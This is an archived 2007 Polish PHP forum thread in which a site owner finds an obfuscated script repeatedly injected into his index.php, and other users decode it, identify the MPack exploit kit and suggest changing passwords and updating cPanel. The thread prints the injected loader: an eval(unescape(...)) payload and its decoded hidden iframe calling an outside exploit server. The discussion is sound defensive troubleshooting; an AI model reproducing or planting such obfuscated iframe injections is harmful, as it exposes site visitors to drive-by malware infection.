Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Dziwny błąd ? Czyżby włamanie ?
Forum PHP.pl > Forum > PHP
Rafiki23
13.07.2007, 19:04:42
Witam,

od kilkinastu dni, przeważnie raz dziennie jestem zmuszony nadpisywać plik index.php, gdyż nie ładuje sie cała strona. Po zobaczeniu kodu źródłowego strony w Mozilli lub IE widzę dziwny kod :
[HTML] pobierz, plaintext 
  1. <script type="text/javascript" language="JavaScript">
  2. eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%5C%22%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%35%30%2E%38%32%2F%6D%70%61%63%6B%2F%69%6E%64%65%78%2E%70%68%70%5C%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%5C%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%5C%22%3E%3C%2F%69%66%72%61%6D%65%3E%22%29%3B%0D%0A%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%22%20%22%3B"));
  3. </script>
[HTML] pobierz, plaintext
Co może być problemem, że taki kod zostaje mi co jakiś czas "dopisany"?
delfinium
13.07.2007, 20:00:45
Nie wiem czy to włam czy nie. cokolwiek się dzieje dopisuje Ci do strony coś takiego:

[HTML] pobierz, plaintext 
  1. <iframe src="http://81.95.150.82/mpack/index.php" style="" height="0" width="0"></iframe>
[HTML] pobierz, plaintext


Whois podaje, że to adres holenderski:

[HTML] pobierz, plaintext 
  1. OrgName:    RIPE Network Coordination Centre 
  2. OrgID:      RIPE
  3. Address:    P.O. Box 10096
  4. City:       Amsterdam
  5. StateProv:  
  6. PostalCode: 1001EB
  7. Country:    NL
[HTML] pobierz, plaintext


a sama strona przekierowuje na główną stronę Yahoo biggrin.gif Nie używasz czasem jakiegoś skryptu co sam Ci nadpisuje index.php?
Rafiki23
13.07.2007, 20:40:49
Cytat(delfinium @ 13.07.2007, 21:00:45 ) *
Whois podaje, że to adres holenderski:

[HTML] pobierz, plaintext 
  1. OrgName:    RIPE Network Coordination Centre 
  2. OrgID:      RIPE
  3. Address:    P.O. Box 10096
  4. City:       Amsterdam
  5. StateProv:  
  6. PostalCode: 1001EB
  7. Country:    NL
[HTML] pobierz, plaintext


a sama strona przekierowuje na główną stronę Yahoo biggrin.gif Nie używasz czasem jakiegoś skryptu co sam Ci nadpisuje index.php?


Mam hosting na webd.pl a z tego co wiem, to oni mają chyba serwery w Holandii. Nie używam żadnego skryptu co mi nadpisuje index.php.

Co mogę zrobić, by mi nie dopisywało tego kodu?
danek
13.07.2007, 21:05:40
Koleś czy ty nie wiesz co to mpack?
TO najlepszy system włamań oparty na php.
Podobno on idzie za 1000$ w Ruskim podziemiu hackerskim.

http://www.heise-online.pl/news/item/277

Zmień hasła do swoich serwerów bo aby przeprowadzić taki atak ktoś musi umieścić ramke iframe na twojej stronie
delfinium
13.07.2007, 21:05:50
Nic dodać. Pytanie tylko skąd ten kod bierze się u Ciebie na stronie? Używasz cPanel?
danek
13.07.2007, 21:06:51
Jak mówi delfinium cPanel w starszych wersjach jest podatny na ataki mpack
Rafiki23
13.07.2007, 21:11:16
Cytat(delfinium @ 13.07.2007, 22:05:50 ) *
Nic dodać. Pytanie tylko skąd ten kod bierze się u Ciebie na stronie? Używasz cPanel?

Tak, cPanel zainstalowany jest na serwerach webd.pl.
Blodo
14.07.2007, 16:57:27
Warto powiadomic adminow zeby zrobili upgrade cpanela do wersji 10, o ile jeszcze tego nie zrobili.
LonelyKnight
14.07.2007, 17:22:23
Podobne zapisy JS (ale akurat nie takie) spotkałem na dwóch stronach hostujących się w home.pl W tych przypadkach był to trojan downloader.

Temat: Problemy z Homepl
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.